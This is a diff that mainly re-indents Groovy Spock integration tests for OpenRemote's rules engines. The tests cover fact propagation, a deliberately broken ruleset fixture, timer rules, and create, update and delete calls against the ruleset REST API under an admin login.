-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, ["All"])
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-        }
+    then: "the facts should be added to the rule engines and rules should have fired"
+    conditions.eventually {
+      assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL + 2
+      assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL + 2
+      assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
+      assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 2
+      assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2 + 2
+      assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.globalEngine, ["All"])
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, ["All"])
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+    }
 
-        when: "the Kitchen room asset is deleted"
-        rulesImport.resetRulesFired()
-        assetStorageService.delete([asset.getId()], false)
+    when: "the Kitchen room asset is deleted"
+    rulesImport.resetRulesFired()
+    assetStorageService.delete([asset.getId()], false)
 
-        then: "the facts should be removed from the rule engines and rules should have fired"
-        conditions.eventually {
-            assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL
-            assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL
-            assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
-            assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2
-            assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.globalEngine, ["All"])
-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, ["All"])
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-        }
+    then: "the facts should be removed from the rule engines and rules should have fired"
+    conditions.eventually {
+      assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL
+      assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL
+      assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
+      assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2
+      assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.globalEngine, ["All"])
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, ["All"])
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+    }
+  }
 
-            }
+  // TODO: Decide if continue on error should be supported
+  @Ignore
+  def "Stop processing when engine in error state"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-    // TODO: Decide if continue on error should be supported
-    @Ignore
-    def "Stop processing when engine in error state"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+    and: "some test rulesets have been imported"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
 
-        and: "some test rulesets have been imported"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      assert rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
 
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            assert rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
-
-        when: "a broken RHS rule is loaded into the building engine"
-        def ruleset = new RealmRuleset(
+    when: "a broken RHS rule is loaded into the building engine"
+    def ruleset = new RealmRuleset(
             keycloakTestSetup.realmBuilding.name,
             "Some broken test rules",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicBrokenRules.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        then: "the building engine should not run and the rule engine status should indicate the issue"
-        conditions.eventually {
-            assert rulesImport.realmBuildingEngine.deployments.size() == 2
-            assert !rulesImport.realmBuildingEngine.running
-            assert rulesImport.realmBuildingEngine.deployments.values().any({
-                it.name == "Some building realm demo rules" && it.status == READY
-            })
-            assert rulesImport.realmBuildingEngine.deployments.values().any({
-                it.name == "Some broken test rules" && it.status == COMPILATION_ERROR && it.error instanceof RuntimeException
-            })
-        }
-
-        when: "an attribute event occurs"
-        def globalLastFireTimestamp = rulesImport.globalEngine.lastFireTimestamp
-        def masterLastFireTimestamp = rulesImport.masterEngine.lastFireTimestamp
-        def realmALastFireTimestamp = rulesImport.realmBuildingEngine.lastFireTimestamp
-        def apartment2LastFireTimestamp = rulesImport.apartment2Engine.lastFireTimestamp
-        def apartment3LastFireTimestamp = rulesImport.apartment3Engine.lastFireTimestamp
-        def apartment2LivingRoomPresenceDetectedChange = new AttributeEvent(
-            managerTestSetup.apartment2LivingroomId, "presenceDetected", true
-        )
-        assetProcessingService.sendAttributeEvent(apartment2LivingRoomPresenceDetectedChange)
-
-        then: "the rules engines should have executed at least one more time"
-        conditions.eventually {
-            assert rulesImport.globalEngine.lastFireTimestamp > globalLastFireTimestamp
-            assert rulesImport.masterEngine.lastFireTimestamp > masterLastFireTimestamp
-            assert rulesImport.realmBuildingEngine.lastFireTimestamp > realmALastFireTimestamp
-            assert rulesImport.apartment2Engine.lastFireTimestamp > apartment2LastFireTimestamp
-            assert rulesImport.apartment3Engine.lastFireTimestamp > apartment3LastFireTimestamp
-        }
-
+    then: "the building engine should not run and the rule engine status should indicate the issue"
+    conditions.eventually {
+      assert rulesImport.realmBuildingEngine.deployments.size() == 2
+      assert !rulesImport.realmBuildingEngine.running
+      assert rulesImport.realmBuildingEngine.deployments.values().any({
+        it.name == "Some building realm demo rules" && it.status == READY
+      })
+      assert rulesImport.realmBuildingEngine.deployments.values().any({
+        it.name == "Some broken test rules" && it.status == COMPILATION_ERROR && it.error instanceof RuntimeException
+      })
     }
+
+    when: "an attribute event occurs"
+    def globalLastFireTimestamp = rulesImport.globalEngine.lastFireTimestamp
+    def masterLastFireTimestamp = rulesImport.masterEngine.lastFireTimestamp
+    def realmALastFireTimestamp = rulesImport.realmBuildingEngine.lastFireTimestamp
+    def apartment2LastFireTimestamp = rulesImport.apartment2Engine.lastFireTimestamp
+    def apartment3LastFireTimestamp = rulesImport.apartment3Engine.lastFireTimestamp
+    def apartment2LivingRoomPresenceDetectedChange = new AttributeEvent(
+            managerTestSetup.apartment2LivingroomId, "presenceDetected", true
+            )
+    assetProcessingService.sendAttributeEvent(apartment2LivingRoomPresenceDetectedChange)
+
+    then: "the rules engines should have executed at least one more time"
+    conditions.eventually {
+      assert rulesImport.globalEngine.lastFireTimestamp> globalLastFireTimestamp
+      assert rulesImport.masterEngine.lastFireTimestamp> masterLastFireTimestamp
+      assert rulesImport.realmBuildingEngine.lastFireTimestamp> realmALastFireTimestamp
+      assert rulesImport.apartment2Engine.lastFireTimestamp> apartment2LastFireTimestamp
+      assert rulesImport.apartment3Engine.lastFireTimestamp> apartment3LastFireTimestamp
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/BasicRulesTimedExecutionTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/BasicRulesTimedExecutionTest.groovy
@@ -37,101 +37,99 @@ import static org.openremote.setup.integration.ManagerTestSetup.DEMO_RULE_STATES
 @Ignore // TODO Implement timer/deferred actions in rules engine
 class BasicRulesTimedExecutionTest extends Specification implements ManagerContainerTrait {
 
-    RulesEngine globalEngine
+  RulesEngine globalEngine
 
-    List<String> globalEngineFiredRules = new CopyOnWriteArrayList<>()
+  List<String> globalEngineFiredRules = new CopyOnWriteArrayList<>()
 
-    def resetRuleExecutionLoggers() {
-        globalEngineFiredRules.clear()
+  def resetRuleExecutionLoggers() {
+    globalEngineFiredRules.clear()
+  }
+
+  def "Check firing of timer rules with realtime clock"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+
+    and: "registered rules execution listeners"
+    rulesService.ruleEngineExecutionListeners = { rulesEngine ->
+      if (rulesEngine.id == RulesService.ID_GLOBAL_RULES_ENGINE) {
+        return createRuleExecutionListener(globalEngineFiredRules)
+      }
     }
 
-    def "Check firing of timer rules with realtime clock"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+    and: "some test rulesets have been imported"
+    Ruleset ruleset = new GlobalRuleset(
+            "Some timer rules",
+            getClass().getResource("/org/openremote/test/rules/BasicTimedExecutionRules.drl").text
+            )
+    rulesetStorageService.merge(ruleset)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      globalEngine = rulesService.globalEngine.get()
+      assert globalEngine != null
+      assert globalEngine.isRunning()
+      assert globalEngine.knowledgeSession.factCount == DEMO_RULE_STATES_GLOBAL
+    }
 
-        and: "registered rules execution listeners"
-        rulesService.ruleEngineExecutionListeners = { rulesEngine ->
-            if (rulesEngine.id == RulesService.ID_GLOBAL_RULES_ENGINE) {
-                return createRuleExecutionListener(globalEngineFiredRules)
-            }
-        }
+    and: "after a few seconds the rule engines should have fired the timed execution rule in the background"
+    new PollingConditions(initialDelay: 22).eventually {
+      def expectedFiredRules = ["Log something every 2 seconds"]
+      assert globalEngineFiredRules.size() > 10
+      assert globalEngineFiredRules.containsAll(expectedFiredRules)
+    }
+  }
 
-        and: "some test rulesets have been imported"
-        Ruleset ruleset = new GlobalRuleset(
-                "Some timer rules",
-                getClass().getResource("/org/openremote/test/rules/BasicTimedExecutionRules.drl").text
-        )
-        rulesetStorageService.merge(ruleset)
+  def "Check firing of timer rules with pseudo clock"() {
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            globalEngine = rulesService.globalEngine.get()
-            assert globalEngine != null
-            assert globalEngine.isRunning()
-            assert globalEngine.knowledgeSession.factCount == DEMO_RULE_STATES_GLOBAL
-        }
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
 
-        and: "after a few seconds the rule engines should have fired the timed execution rule in the background"
-        new PollingConditions(initialDelay: 22).eventually {
-            def expectedFiredRules = ["Log something every 2 seconds"]
-            assert globalEngineFiredRules.size() > 10
-            assert globalEngineFiredRules.containsAll(expectedFiredRules)
-        }
+    and: "registered rules execution listeners"
+    rulesService.ruleEngineExecutionListeners = { rulesEngine ->
+      if (rulesEngine.id == RulesService.ID_GLOBAL_RULES_ENGINE) {
+        return createRuleExecutionListener(globalEngineFiredRules)
+      }
+    }
 
-            }
+    and: "some test rulesets have been imported"
+    Ruleset ruleset = new GlobalRuleset(
+            "Some timer rules",
+            getClass().getResource("/org/openremote/test/rules/BasicTimedExecutionRules.drl").text
+            )
+    rulesetStorageService.merge(ruleset)
 
-    def "Check firing of timer rules with pseudo clock"() {
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      globalEngine = rulesService.globalEngine.get()
+      assert globalEngine != null
+      assert globalEngine.isRunning()
+      assert globalEngine.knowledgeSession.factCount == DEMO_RULE_STATES_GLOBAL
+    }
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
+    and: "after a few seconds the rule engines should not have fired any rules"
+    new PollingConditions(timeout: 5, initialDelay: 3).eventually {
+      assert globalEngineFiredRules.size() == 0
+    }
 
-        and: "registered rules execution listeners"
-        rulesService.ruleEngineExecutionListeners = { rulesEngine ->
-            if (rulesEngine.id == RulesService.ID_GLOBAL_RULES_ENGINE) {
-                return createRuleExecutionListener(globalEngineFiredRules)
-            }
-        }
+    when: "the clock is advanced by a few seconds"
+    advancePseudoClock(100, SECONDS, container)
+    // TODO Weird behavior of timer rules, pseudo clock, and active mode: More than 5 seconds is needed to fire rule twice
+    // even more strange it stops at 2 even when advanced for more time. The same problems are with timer(cron: )
+    // realtime clock seems to be OK
 
-        and: "some test rulesets have been imported"
-        Ruleset ruleset = new GlobalRuleset(
-                "Some timer rules",
-                getClass().getResource("/org/openremote/test/rules/BasicTimedExecutionRules.drl").text
-        )
-        rulesetStorageService.merge(ruleset)
-
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            globalEngine = rulesService.globalEngine.get()
-            assert globalEngine != null
-            assert globalEngine.isRunning()
-            assert globalEngine.knowledgeSession.factCount == DEMO_RULE_STATES_GLOBAL
-        }
-
-        and: "after a few seconds the rule engines should not have fired any rules"
-        new PollingConditions(timeout: 5, initialDelay: 3).eventually {
-            assert globalEngineFiredRules.size() == 0
-        }
-
-        when: "the clock is advanced by a few seconds"
-        advancePseudoClock(100, SECONDS, container)
-        // TODO Weird behavior of timer rules, pseudo clock, and active mode: More than 5 seconds is needed to fire rule twice
-        // even more strange it stops at 2 even when advanced for more time. The same problems are with timer(cron: )
-        // realtime clock seems to be OK
-
-        then: "the rule engines should have fired the timed execution rule in the background"
-        new PollingConditions(timeout: 5,initialDelay: 3).eventually {
-            def expectedFiredRules = ["Log something every 2 seconds"]
-            assert globalEngineFiredRules.size() > 1
-            assert globalEngineFiredRules.containsAll(expectedFiredRules)
-        }
-
-            }
+    then: "the rule engines should have fired the timed execution rule in the background"
+    new PollingConditions(timeout: 5, initialDelay: 3).eventually {
+      def expectedFiredRules = ["Log something every 2 seconds"]
+      assert globalEngineFiredRules.size() > 1
+      assert globalEngineFiredRules.containsAll(expectedFiredRules)
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/BasicRulesetResourceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/BasicRulesetResourceTest.groovy
@@ -40,1352 +40,1350 @@ import static org.openremote.model.rules.Ruleset.Lang.JSON
 
 class BasicRulesetResourceTest extends Specification implements ManagerContainerTrait {
 
-    def "Access rules as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def rulesService = container.getService(RulesService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        and: "some test rulesets have been imported"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
-
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
-
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
-
-        /* ############################################## READ ####################################### */
-
-        when: "the global rules are retrieved"
-        def ruleDefinitions = rulesetResource.getGlobalRulesets(null, null, false)
-
-        then: "result should match"
-        ruleDefinitions.length == 2
-        ruleDefinitions[0].name == "Some global demo rules"
-        ruleDefinitions[0].lang == GROOVY
-        ruleDefinitions[0].rules == null // Don't retrieve the (large) rules data when getting a list of rule definitions
-
-        when: "some realm rules are retrieved"
-        ruleDefinitions = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
-
-        then: "result should match"
-        ruleDefinitions.length == 1
-        ruleDefinitions[0].name == "Some master realm demo rules"
-        ruleDefinitions[0].lang == GROOVY
-
-        when: "some realm rules in a non-authenticated realm are retrieved"
-        ruleDefinitions = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
-
-        then: "result should match"
-        ruleDefinitions.length == 1
-        ruleDefinitions[0].name == "Some building realm demo rules"
-        ruleDefinitions[0].enabled
-
-        when: "some asset rules are retrieved"
-        ruleDefinitions = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
-
-        then: "result should match"
-        ruleDefinitions.length == 1
-        ruleDefinitions[0].name == "Some apartment 2 demo rules"
-        ruleDefinitions[0].lang == GROOVY
-        (ruleDefinitions[0] as AssetRuleset).isShowOnList()
-
-        /* ############################################## WRITE ####################################### */
-
-        when: "global ruleset is created"
-        def globalRuleset = new GlobalRuleset("Test global definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createGlobalRuleset(null, globalRuleset)
-        def rulesetId = rulesetResource.getGlobalRulesets(null, null, false)[2].id
-        globalRuleset = rulesetResource.getGlobalRuleset(null, rulesetId)
-        def lastModified = globalRuleset.lastModified
-
-        then: "result should match"
-        globalRuleset.id == rulesetId
-        globalRuleset.version == 0
-        globalRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        globalRuleset.name == "Test global definition"
-        globalRuleset.rules == "SomeRulesCode"
-        globalRuleset.lang == GROOVY
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.globalEngine.get().deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == globalRuleset.version
-        }
-
-        when: "a global ruleset is updated"
-        globalRuleset.name = "Renamed test global definition"
-        globalRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateGlobalRuleset(null, rulesetId, globalRuleset)
-        globalRuleset = rulesetResource.getGlobalRuleset(null, rulesetId)
-
-        then: "result should match"
-        globalRuleset.id == rulesetId
-        globalRuleset.version > 0
-        globalRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        globalRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
-        globalRuleset.name == "Renamed test global definition"
-        globalRuleset.rules == "SomeRulesCodeModified"
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.globalEngine.get().deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == globalRuleset.version
-        }
-
-        when: "a global ruleset is deleted"
-        rulesetResource.deleteGlobalRuleset(null, rulesetId)
-        globalRuleset = rulesetResource.getGlobalRuleset(null, rulesetId)
-
-        then: "the result should be not found"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        and: "the ruleset should be removed from the engine"
-        conditions.eventually {
-            assert rulesService.globalEngine.get() != null
-            def deployment = rulesService.globalEngine.get().deployments.get(rulesetId)
-            assert deployment == null
-        }
-
-        when: "a non-existent global ruleset is updated"
-        rulesetResource.updateGlobalRuleset(null, 1234567890l, globalRuleset)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "a realm ruleset is created in the authenticated realm"
-        def realmRuleset = new RealmRuleset(MASTER_REALM, "Test realm definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-        rulesetId = rulesetResource.getRealmRulesets(null, MASTER_REALM, null, false)[1].id
-        realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
-        lastModified = realmRuleset.lastModified
-
-        then: "result should match"
-        realmRuleset.id == rulesetId
-        realmRuleset.version == 0
-        realmRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        realmRuleset.name == "Test realm definition"
-        realmRuleset.rules == "SomeRulesCode"
-        realmRuleset.realm == keycloakTestSetup.realmMaster.name
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
-
-        when: "a realm ruleset is updated"
-        realmRuleset.name = "Renamed test realm definition"
-        realmRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
-        realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
-
-        then: "result should match"
-        realmRuleset.id == rulesetId
-        realmRuleset.version == 1
-        realmRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        realmRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
-        realmRuleset.name == "Renamed test realm definition"
-        realmRuleset.rules == "SomeRulesCodeModified"
-        realmRuleset.realm == keycloakTestSetup.realmMaster.name
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
-
-        when: "a realm ruleset is updated with an invalid realm"
-        realmRuleset.realm = "thisdoesnotexist"
-        rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a realm ruleset is updated with an invalid id"
-        realmRuleset.realm = MASTER_REALM
-        realmRuleset.id = 1234567890l
-        rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a non-existent realm ruleset is updated"
-        rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "a realm ruleset is deleted"
-        rulesetResource.deleteRealmRuleset(null, rulesetId)
-        rulesetResource.getRealmRuleset(null, rulesetId)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        and: "the ruleset should be removed from the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
-            assert deployment == null
-        }
-
-        when: "a realm ruleset is created in a non-authenticated realm"
-        realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
-        rulesetId = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)[1].id
-        realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
-        lastModified = realmRuleset.lastModified
-
-        then: "result should match"
-        realmRuleset.id == rulesetId
-        realmRuleset.version == 0
-        realmRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        realmRuleset.name == "Test realm definition"
-        realmRuleset.rules == "SomeRulesCode"
-        realmRuleset.realm == keycloakTestSetup.realmBuilding.name
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
-
-        when: "an asset ruleset is created in the authenticated realm"
-        def assetRuleset = new AssetRuleset(managerTestSetup.smartOfficeId, "Test asset definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-        rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.smartOfficeId, null, false)[0].id
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-        lastModified = assetRuleset.lastModified
-
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 0
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.name == "Test asset definition"
-        assetRuleset.rules == "SomeRulesCode"
-        assetRuleset.assetId == managerTestSetup.smartOfficeId
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
-        when: "an asset ruleset is updated"
-        assetRuleset.name = "Renamed test asset definition"
-        assetRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 1
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
-        assetRuleset.name == "Renamed test asset definition"
-        assetRuleset.rules == "SomeRulesCodeModified"
-        assetRuleset.assetId == managerTestSetup.smartOfficeId
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
-        when: "an asset ruleset is updated with an invalid asset ID"
-        assetRuleset.assetId = "thisdoesnotexist"
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "an asset ruleset is updated with an invalid id"
-        assetRuleset.assetId = managerTestSetup.smartOfficeId
-        assetRuleset.id = 1234567890l
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a non-existent asset ruleset is updated"
-        rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "an asset ruleset is deleted"
-        rulesetResource.deleteAssetRuleset(null, rulesetId)
-        rulesetResource.getAssetRuleset(null, rulesetId)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        and: "the ruleset should be removed from the engine"
-        conditions.eventually {
-            assert rulesService.assetEngines.get(managerTestSetup.smartOfficeId) == null
-        }
-
-        when: "an asset ruleset is created in a non-authenticated realm"
-        assetRuleset = new AssetRuleset(managerTestSetup.apartment2Id, "Test asset definition", GROOVY, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-        rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)[1].id
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-        lastModified = assetRuleset.lastModified
-
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 0
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.name == "Test asset definition"
-        assetRuleset.rules == "SomeRulesCode"
-        assetRuleset.assetId == managerTestSetup.apartment2Id
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.apartment2Id).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
